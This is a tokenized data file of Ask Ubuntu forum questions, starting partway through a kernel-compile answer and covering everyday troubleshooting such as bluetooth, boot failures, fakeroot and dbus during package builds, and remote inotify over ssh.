mrproper by copying it from /boot to /usr/src/ubuntu-precise . from source directory ubuntu-precise : $ sudo cp /boot/config- $ ( uname -r ) ./.config # $ ( uname -r ) checks current kernel and grabs it $ make menuconfig # to open old config , make changes and save $ fakeroot make-kpkg-j 2 -- initrd -- append-to-version=-jn kernel_image kernel_headers where 2 = # of processors and -jn is appended to the deb to notate changed version it is compiling right now , but i sincerely hope i do n't receive an error . we sincerely need one good set of instructions which instead of saying do this or that , explains what you are doing when you use the command and a wiki should be kept up to date .
321640	can i install ubuntu desktop programs on my nexus 4 ?	i 'm asking this question because i want to work on my phone , not on my pc in the office . i read that ubuntu can be installed on the nexus 4 , the phone i have , and can be used as a complete pc . i also searched the web for connecting the device to a monitor and i found slimport . bluetooth keyboard and mouse could do the trick . the question is : how to switch to desktop mode ? can i install ubuntu desktop applications ? mostly i 'm interested on installing eclipse . a video demonstrating this would be nice .
321643	how to install and use php-cgi	i have installed lamp server via tasksel . where is php directory ? how to install and use php-cgi if i do n't have it inside php directory ( i need to copy php-cgi file from there ) thanks in advance .
321646	add a cut-run-paste shortcut to gnome shortcuts	i have a program that gets text from the clipboard , does some operations on it and returns it to the clipboard . then , the program shuts down . can i make a shortcut -- -like a gnome keyboard shortcut , context menu item , etc. -- - for it that cuts selected text , runs my program and pastes the text ? or do you have any other solution for this ? the shortcut/operation should work all over ubuntu .
321649	gnome lock screen	i have installed ubuntu 13.04 gnome shell version . when locking the screen i get the clock in the middle with the desktop icons in the back ground . i would like to know if there is any way to change this so the icons would not show on the lock screen .
321650	setting up 802.1x wifi	i just installed ubuntu on an 'of the self ' lenovo machine . i can use the web just fine from home , but at the university i can not connect to the networks . after some research i suspect that 802.1x protocol is not installed or not activated . i have read this but for some reason if have a directory at /etc/wpa_supplicant/ but no file called /etc/wpa_supplicant.conf , and none of the files inside that directory looks similar to the file in the site . so my questions : how do i check if 802.1x is installed ? how do i check if 802.1x is active ? can i run a test from home to make sure that everything is ready ? i want to check it so i do n't have to be there try it , and if not look for a computer an set up stuff again while i should be studying . if relevant : i have ubuntu 13.04 , 32 bit . runs on a lenovo g550 xsupplicant is not a recognized command . the files in /etc/wpa_supplicant/ are : action_wpa.sh , functions_wpa.sh , ifupdown.sh .
321661	i moved `/usr/share/gimp/2.0/` to trash and ca n't find it	i moved /usr/share/gimp/2.0/ to trash and now i ca n't find it . is it gone because i moved it from a root owned directory to the trash ? is there a place i can download the file ?
321662	steam usability , from a user 's view	i 've obviously seen the advertising with steam now working properly on ubuntu , but i 've also heard from a few people that a lot of games still do n't actually work . so i 'm looking for a definitive answer from the users on the pros and cons . what are people 's views ? this is basically the only thing stopping me changing to ubuntu.. thanks for the input boys and girls .
321663	why does the ubuntu download page give me an amd64 build when i choose 64b ?	http : //www.ubuntu.com/download/desktop when i select 64 bit ( for newer machines ) and hit download , i get ubuntu-12.04.2-server-amd64.iso . is this to be expected , or an error ? i want to install 64b ubuntu 12.04 lts into a vm in a 64b windows 7 machine . the processor is not an amd so i wonder if i have the right version .
321667	12.04 - screen glitches / freezes after `` lock screen ''	ubuntu 12.04 , 3.5.0-36-generic kernel through lts hardware enablement stack . hd4600 gpu on top of an intel core i7-4770 . when i use the `` lock screen '' feature of the desktop , sometimes i will go back to the machine hours later and will see one of the following two glitches : the screen is mostly black with a bunch of glitchy graphics on it . i can still move the mouse , ca n't click on anything though , and nothing happens . the system looks unlocked ( and if i remember correctly , the monitor is on ) . whatever was on the screen before the lock is now fully visible , although you ca n't click on anything . this has showed my email inbox contents to the rest of the office more than once . the os has n't actually frozen at this point . i usually open a tty with ( ctrl+alt+f1 ) and run : sudo stop lightdm sudo start lightdm and am able to resume work , even though all of the processes open before ( like firefox , skype etc ) seem to be gone . first of all , is this an known issue and can i fix it ? secondly , is there a log somewhere i could look at to see what the specific issue is ? /var/log/lightdm did n't reveal much , but i might have been looking in the wrong place . any suggestions would be super welcome . workaround i stumbled upon : if someone else is running into this issue , there 's no reason to reboot the machine when it happens . i think switching to a virtual tty with alt+ctrl+f1 and then back to alt+ctrl+f7 seems to fix the problem . even better , you can avoid it altogether by locking the screen in x and then switching to tty1 when you want to leave the machine alone for some time . switch back to x when you 're back . has n't glitched out on me yet , probably because it forces some kind of `` full refresh '' every time you do it .
321670	fakeroot and package building	we have developed a network pub/sub communication suite . it is in use across a number of different applications and domains , most notably on our payloads aboard the international space station ( iss ) . ubuntu is our primary development and deployment system . all our code is nicely packaged . in the process of building the packages , i would like to run the test suites included in each code base . however ... our communication protocol uses avahi , which in turn uses dbus . thus our tests use dbus . when building a package , `` fakeroot '' is invoked to solve a number of problems . however , it introduces a problem that i 've been unable to solve . when our tests run without fakeroot , we see something like this : [ pid 3286 ] sendto ( 12 , `` auth external 31303030\r\n '' , 24 , msg_nosignal , null , 0 ) = 24 [ pid 3286 ] read ( 12 , `` ok 38b4600ae82865f9eba81cb700000 '' ... , 2048 ) = 37 when the same test is run using fakeroot , we see something like this : [ pid 3280 ] sendto ( 12 , `` auth external 30\r\n '' , 18 , msg_nosignal , null , 0 ) = 18 [ pid 3280 ] read ( 12 , `` rejected external dbus_cookie_sh '' ... , 2048 ) = 46 it turns out that the dbus authentication is simply using the ascii code of the string representation of the uid for the user . when run normally , the uid is 1000 , '1 ' is 31 , '0 ' is 30 ; therefore the authentication token for uid 1000 is 31303030 . under fakeroot , the program thinks its uid is 0 and sends the token 30 . this is rejected and the whole mess fails . this is connecting to the system dbus and not a session dbus , so i ca n't just start a new instance inside fakeroot . i 've gone through our code , the avahi code and the dbus code , and do n't see any way to work around this . so finally the question - is there a way to run tests during package building without the fakeroot wrapper ? i really want the tests to run , since the code is submitted to a buildbot system that has a wide variety of linux distributions and versions . this provides much better test coverage than just running the tests on my development system .
321672	what is the differences between rpm package manager and alien software ?	an app required me to install rpm package to install .rpm files . but as far as i know , there is another software called `` alien '' . what is the difference between this two ? i could n't manage to find on search engines .
321673	how to upgrade a particular package dependencies only ?	let 's say i have a package a which has depends : b ( > = 1.0.0 ) in its control file . the b was installed as an a dependency some time ago with 1.0.0 version . now b was updated in the repository to the 1.0.42 version and i 'd like to upgrade it . what i do n't like to do : apt-get install b since it will mark b as `` manually installed '' ( not sure how to name it correctly ) package and it wo n't be removed with autoremove if i decide to stop using a ever . so is there an analogue of apt-get upgrade that only upgrades a particular package and its dependencies ( probably recursive , it does n't matter in my case since b does n't depend on anything else ) only ? ps : i 'm asking about currently available lts versions . so 10.04 and 12.04
321675	running ubuntu 13.04 and windows 8 at the same time	i 'm inspired by the capability of the upcoming asus transformer trio to switch between android and windows at the push of a button . as i understand it , this is because each os is stored on its own dedicated drive . my question is this : if i were to set up a desktop with 2x hard drives , one for ubuntu and the other for windows , would it be possible to set this up in a way that i could switch between the two without ever having to log out ? i see plenty of posts on here stating that i can set it up so i can choose between either os or hard drive at the boot screen , but i 'm interested in being able to switch with a simple keyboard shortcut , not unlike switching between programs using alt+tab . anyone have any ideas ?
321679	battery icon is not displayed on the gnome shell 3 desktop . running ubuntu 13.04	this is what i get when i run `` gnome-power-statistics '' ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:19:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:27:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:40:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:51:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:60:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:70:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:78:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:103:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:116:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:128:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:139:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:216:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:224:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:243:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:253:18 : not a number ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:38:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:44:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:54:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:59:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:64:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:68:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:75:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:80:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:85:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:89:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:95:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:100:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:105:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:111:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:121:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:126:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:132:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:136:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:142:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:147:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:152:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:156:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:161:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:166:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:260:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:264:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:269:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:274:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:279:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:284:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:288:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:292:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:297:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:302:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:307:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:312:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:316:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:320:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:325:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:330:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:335:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:340:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:344:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:348:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:353:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:358:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:363:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:368:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:375:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets-assets.css:379:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2395:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2403:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2408:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2413:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2422:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2430:22 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gnome-applications.css:475:25 : not a valid image ( gnome-power-statistics:3305 ) : gtk-warning ** : theme parsing error : gnome-applications.css:491:25 : not a valid image fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . -lenovo-g580 : ~ $ gnome-power-statisticsgnome-power-statistics the power statistics show that i have a battery on my laptop but the battery/power icon is not displayed which makes it very annoying ... any help regarding this topic will help !
321687	multimedia keys are not working with my hp probook 4540s	i have hp probook 4540s . my multimedia keys such as wifi on/off & brightness control keys does n't work with ubuntu 13.04 . ( keys function well with ubuntu 12.04 ) both are working well in windows . please give me a workaround..
321693	user name is missing in top panel in ubuntu	username is missing in top panel in ubuntu 12.04 in gnome classic do n't know why , i have tried to show it using dconf-tools but no success at all . how to show it back , i have tried to reset panels , but no success . please help me .
321694	uploading text files into ssh account	i am using my instructor 's account , connecting with ssh via terminal . i am trying to upload a text file into this account but could n't find a command for this . i tried to copy the index of file and paste it into a file created by 'nano ' command , but i think this causes some problems for my calculations . any suggestions ?
321699	i want to install fedora in virtual box with a usb stick	i managed to install virtual box on my ubuntu system ; now i want to install fedora within the virtual machine . i have a fedora image installed on a usb stick that is accessible by a vmdk file - an image used to install fedora on a system if no oses were on my computer . i specify that file as an hard drive to my virtual machine , hoping than the system would see it as a partition from where i might install fedora , but that 's not what happens . the system tells me it can not boot from that drive . what have i done wrong ?
321700	no unity or hud	so i installed ubuntu 13.04 and everything was working just fine . i installed my drivers for my radeon hd 7770 restarted the computer and everything still worked fine but when i updated the software via the software updater and restarted unity was gone . it boots up to my desktop wallpaper with the folders on the desktop but the side panel and top panel are gone . i dont know what to do .
321712	how to know ubuntu 32 or 64 from livecd	i am running a ubuntu server . from live cd ( 32bit ) how to know version server ( 32 or 64bit ) . what can i do ? thanks !
321719	mythtv backend configuration . ca n't add myself as root user	i have a fresh install of ubuntu 13.04 . i received the following messages : message 1 : you must be a member of the `` mythtv '' group before starting any mythtv applications . would you like to automatically be added to the group ? ( note : sudo access required ) message 2 : [ please enter your current login password to be added to the mythtv group ] when i enter my login password there is a pause , and the i get the message : [ incorrect password ... ..try again ] after 3 tries i get the message : [ failed to run adduser 'david ' 'mythtv ' as user root . wrong password ]
321721	boot screen gone away . 13.04	i dont know what i did or if it was after an upgrade but my ubuntu boot screen is gone . it 's been replaced by a flashing curser in the upper lefthand side of the screen followed by a prompt for my password that goes away then it boots into the os . any idea how this can be fixed ? also now when i shut down or restart i get a quick flash of messages . something about swap . cant make it out . it goes by to quick . dont know if its related . anyway , any help would be great .
321727	ubuntu 12.04.2 on a lenovo t431s	i 'm cross-posting this from the ubuntu forums as it seems like there 's some interest here in this new ultrabook . i 'm extremely happy with ubuntu on it . ubuntu 12.04.2 on the new lenovo thinkpad t431s hi everyone , i just got the new thinkpad t431s . it 's a great computer . the only downside really is the screen ( it 's a little washed out , but is one of the rare 1600x900 resolution 14” inch ones , so i let it slide ) . i just wanted to share what i did to get ubuntu running on it with pretty much all of the hardware functioning and possibly save someone some time . bios settings : i had a little trouble getting the partitioning correct . my model has a 24 gb ssd and a 320 gb hard drive . this computer ships with uefi boot and trusted computing enabled . after some trouble , i went in to the bios ( you have to fn + esc to disable the function keys and then f1 to get into the setup ) . i disabled secure boot and changed it from uefi to legacy boot only . then i booted into the installer and partitioned the drives as follows : on the hard drive 2 mb bootloader partition 315 gb ext4 partion for /home 5 gb swap partition on the ssd : 24 gb ext4 partition for / this seemed to work ( trying to set the efi boot partition kept leading to errors ) . then i went through all of the installation process . keep in mind that if you want to log in using the fingerprint reader , you ca n't encrypt your /home directory ( or you can , it just means that you 'll also have to enter the password in addition to the finger swipe ) . network : as installed , the wireless card does n't show up ( it 's an intel centrino 6235n ) . i connected to my local network via an ethernet connection and ran all of the system updates . once the 3.5.x kernel was installed , the network card was recognized . the connection was a little flaky as some people have noticed with this card , so i disabled n networking via the following procedure : http : //askubuntu.com/questions/28244 ... dvanced-n-6235 it now works fine . fingerprint reader : fingerprint-gui needed a little help via the following procedure : http : //askubuntu.com/questions/19352 ... t430s-in-12-04 after following the steps in the top answer , it worked fine . keep in mind that as mentioned above , if you encrypt your home directory , you will still have to enter a password to log in . also , if you log in via the fingerprint reader , you will still have to enter a password for you keyring , unless you want to get rid of the password on that ( not recommended ) : how can i stop being prompted to unlock the 'default ' keyring on boot ? everything else seems to work fine out of the box ( including the camera and the sd card reader ) . the trackpad does n't work like it does in windows , however . the top row of “keys” meant to go with the tracking nub do not map as they do in windows . edge scrolling and two-finger scrolling do work . overall , it 's a pretty great little ultrabook and pretty linux compatible . edit : i did one more thing to get the hardware working better . i was a little dissatisfied with the way that the multitouch was working ( i wanted a middle mouse button three-finger click ) , so i went with the following procedure : first , i created the following directory in /etc/x11 , /etc/x11/xorg.conf.d and then a configuration file that runs when x is started , touchpad.conf , with the following lines : section `` inputclass '' identifier `` touchpad '' # required matchistouchpad `` on '' # required driver `` synaptics '' # required option `` minspeed '' `` 0.5 '' option `` maxspeed '' `` 1.0 '' option `` accelfactor '' `` 0.075 '' option `` tapbutton1 '' `` 1 '' # left click with one finger tap option `` tapbutton2 '' `` 3 '' # right click with two finger tap option `` tapbutton3 '' `` 2 '' # middle click with three finger tap option `` verttwofingerscroll '' `` 1 '' # two finger vert scroll option `` horiztwofingerscroll '' `` 1 '' # two finger horz scroll option `` maxtaptime '' `` 250 '' # alter this to get good multifinger tap recognition , this is what worked well for me option `` fasttaps '' `` 1 '' option `` horizedgescroll '' `` 1 '' option `` palmdetect '' `` 1 '' # detects palm touches while typing endsection any other tweaks you want can be found here : http : //linux.die.net/man/5/synaptics then you have to disable gnome control of the touchpad by first installing dconf editor through the software store . uncheck `` active '' in org > gnome > settings-daemon > mouse this gets two finger scrolling , multfinger clicks and everything else working well . adding a startup application with the following line '' syndaemon -i 0.5 -d '' restores the disable touchpad while typing .
321731	inotify in a remote shell and get the output back	my problem is very similar this one : inotify not fast enough except i am running inotify in a remote shell . i need to monitor for file change on machinea from machineb . machineb has ssh access to machinea but not the other way around . while true ; do filepath= $ ( ssh -i key.pem a @ machinea `` inotifywait -m -e close_write $ remote_watch_dir -- format ' % w % f ' '' ) echo $ filepath done in the above code , $ filepath is always empty . if i do n't place -m then it will work , but just for one file . as mentioned in this problem : inotify not fast enough i need to handle multiple file changes too . any suggestions on how to make it work ? i need to trigger inotify over multiple files in a remote shell and get back a list of files which were modified in the remote machine .
321733	no possible adding of searching engines `` ixquick '' and `` startpage '' to ubuntu-firefox ( 13.04/22 )	i have a problem regarding the adding of new searching engines . to avoid google and its data collecting , i would like to add the searching engines `` ixquick '' and `` startpage '' ( both by the same company ) to my firefox . instead of using cookies , both above mentioned searching engines allow to do ones settings ( language , searching results etc . ) and generete an url of it . i would like to use these urls as chooseable searching engines in the right corner of my firefox browser , where i also can choose for instance google , wikipedia and so on . i 'm using ubuntu 13.04 with its special/customized firefox ( 22 ) . the problem is : 1 ) if directly on the pages of the searching engines ixquick and startpage with the specially generated for me url , i choose `` add to firefox '' , then on `` install '' - and nothing happens . with both the https version , which i would prefer , and the http version . so , to add these searching engines directly from their web pages to firefox , seems not possible . 2 ) then i tried to search in firefox for `` add ons '' . there , i found ixquick and startpage , however , not with my preferenceds , but the normal page versions , and unfortunately , just in english . but ok , as the other option ( nr . 1 ) did not work , it would be better than to not have it . but as i click on `` install '' this add ons , it is not possible and i 'd always receive a message `` you can only install this add on to a mozilla based firefox browser '' ( or somehow similar ) . this leads me to the conclusion that maybe the special ubuntu firefox version has some difficulties ... ? or would there be another option to install finally the serching engines i want to have ? thank you for your attention and for any help in advance .
321737	issues when installing ubuntu	i am trying to install ubuntu to a new server . installation of ubuntu 12.04 lts 64-bit desktop didnât report any faults . however , the system can not boot after installation . the screen stopped when filled with purple , and then usb power and vga signal lost . installation of ubuntu 12.04 lts 64bit server : can not enter the installation program . errors reported : udevd [ 355 ] : timeout : killing /sbin/modprobe -bc pci : xxxxxxxxxxxxxxxxxx then kernel panic of the installation program . any suggestions ? thanks .
321740	ubuntu touch phone apps on desktop	i 'm running ubuntu touch on a galaxy nexus . loving it . is there a way to run the phone-app on a desktop from the phone ? i.e. , if we were running x11 , i would simply export this through an ssh session . i 've installed xorg ( minimal x server ) , and can run x apps from my phone on my desktop . is there a way to do the same with qml apps ? want to be able to send sms messages from my computer through the phone , and am looking for a quick and dirty hack to do it . thanks .
321743	where are the rust ( aka rust-lang ) packages for ubuntu ?	i 'd like to play with the rust language on ubuntu , but there do n't seem to be any packages . did i miss it or is there some problem ?
321747	awkward fonts in ubuntu 13.04	i have installed ubuntu 13.04 in vmware workstation . after 3 week from the installation , yesterday , vmware showed me an error i could not read that as i blindly clicked on ok . since then the fonts in ubuntu are appearing in awkward manner ( see below ) . rest everything is ok except the overall fonts . i have tried resetting the unity interface using dconf-config and also tried unity-tweak-tool to change the fonts . bothmethods did n't work . i did n't want to reisntall ubuntu again . please provide a solution .
321749	nor ubuntu or windows are booting	i was installing ubuntu in a partition created directly from the installer , using the cd method , after the step when one set up the partitions of the hard drive , the installation crashed . after that i was trying to do it again and the same situation . after a while i got tired and turn it off , when i reboot it and tried to use windows , neither of the os worked , it just goes into a black windows with and `` _ '' blinking . please help i 'm afraid that my pc had died , or the windows os had been damaged , lots of important files from the university .
321750	ubuntu do n't detect my bluetooth receiver , how to fix it ?	read first this is a canonical question that will be signpost to solve bluetooth issues . please , whenever any of this answers does not fix your issue , provide the same information as this question in another question and add a link to this one . you should also provide what were the results/changes of each of the solutions . for about two days now , my bluetooth has not been functional . the bluetooth icon is not present on the top panel . the bluetooth window is completely frozen as can be seen in this picture : the output for bluetoothd -d -n is : bluetoothd [ 3390 ] : bluetooth daemon 4.98 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 3390 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) pageto=8192 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 3390 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) discov_interval=30 bluetoothd [ 3390 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' the output for start bluetooth is : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.343 '' ( uid=1000 pid=19042 comm= '' start bluetooth `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) my ubuntu version is 12.04 . any idea as to how this can be sorted ? edit patebin link containing the contents of /var/log/dmesg : link edit # 2 hcitool dev : devices : hci0 74 : e5:43:36:65:21 cat /etc/dbus-1/system.d/bluetooth.conf : paste bin link ps aux| grep bluetooth : root 1065 0.0 0.0 4740 2028 ? ss 15:33 0:00 /usr/sbin/bluetoothd dorsatum 2392 0.0 0.2 142772 10956 ? sl 15:33 0:00 bluetooth-applet root 20960 0.0 0.2 76268 10780 ? sl 22:08 0:00 bluetooth-applet dorsatum 21203 0.0 0.0 4388 832 pts/0 s+ 22:13 0:00 grep -- color=auto bluetooth
321751	is using vi to view log files in prod servers not recommended ?	we have ubuntu servers in production . our lead architect tells me we should not use vi to view log files . instead use cat . i want to know if there is any inherent risk associated with using vi/vim to view log files .
321753	`` df -h ~ '' thinks my drive is full , but it should n't even be half way . ca n't install stuff ( 13.04 )	using a corsair force 3 120gb ssd , with 13.04 ( no other os 's installed ) df -h ~ reports that i have 94gb available ( wut ? ) , and 82gb used ( wrong ) . gparted says i 'm only using a few hundred megabytes ( way off ) disk usage analyser says i 'm using about 56gb , but also thinks i 'm almost full up ( wtf ) from searching , i found someone suggest that the trash is n't being emptied properly ( i think that was what they said ) , and that i should do something called `` vaccuming '' to the drive . no idea how , or what it is , or even if it is actually relevant . any input is welcome . i am still very new to ubuntu so this might be some n00b mistake on my part . df -h ~ /dev/mapper/ubuntu -- vg-root 94g 82g 8.2g 91 % /
321754	how to run java program in ubuntu in following situtations	sachin @ sachin-lenovo-g550 : ~ $ java -version java version “1.7.0_21″ openjdk runtime environment ( icedtea 2.3.9 ) ( 7u21-2.3.9-1ubuntu1 ) openjdk server vm ( build 23.7-b01 , mixed mode ) when i ran the above command this showed that java is installed in my system , but when i am going to compile any java program it gives the following error message : sachin @ sachin-lenovo-g550 : ~/programs $ javac abc.java the program ‘javac’ can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * gcj-4.7-jdk * openjdk-7-jdk * openjdk-6-jdk try : sudo apt-get install please tell me how to get rid of it and run my java program .
321757	syslog-ng server	i 'm doing a syslog server project for my summer training . i 'm a novice but i 'm sure the challenges the project will bring can give me a shot of becoming more proffessional and take up system administration . i am using ubuntu server 12.04 and i have installed syslog-ng . however , the command /etc/syslog-ng/syslog-ng.conf , is returning : -bash : /etc/syslog-ng/sylog-ng.conf : permission denied what can i do to access the configuration file .
321760	working very slow after some time	i have just started working on ububtu 12.04.when i turned on , after some time it gets hanged for 2 sec and after the processing speed gets slows down . any suggestions ?
321763	triple boot windows 7 , 8 and ubuntu 13.04	i have got a new computer and i want to install windows 7 , windows 8 and ubuntu 13.04 on it , in which order should i install them ? ? i tried installing windows 7 first then windows 8 and finally ubuntu 13.04 but it shows only windows 7 , 8 during boot . can anyone please provide exact steps to be followed while installing .
321765	error while building unity 8	i was following the steps given on this page to build unity 8 . when i run the command ./build -s , it works fine , adds the ppas required and then it runs the apt-get command , and therein lies the error . i get the following error- failed to fetch http : //ppa.launchpad.net/phablet-team/desktop-deps/ubuntu/dists/precise/main/source/sources 404 not found and failed to fetch http : //ppa.launchpad.net/phablet-team/desktop-deps/ubuntu/dists/precise/main/binary-i386/packages 404 not found and so the , ./build -s command is not executed properly , how can this be solved ? my system is on ubuntu 12.04
